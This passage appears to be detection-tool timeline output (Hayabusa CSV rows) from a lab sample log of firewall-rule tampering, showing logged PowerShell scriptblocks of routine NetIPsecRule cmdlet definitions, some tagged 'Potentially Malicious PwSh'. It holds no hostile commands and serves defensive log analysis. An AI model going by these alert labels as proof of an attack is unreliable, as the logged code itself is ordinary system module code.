$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters,",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, 
$__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecRule' -Alias '*' function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceType",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecRule' -Alias '*' function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, 
ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceType",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Filter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if 
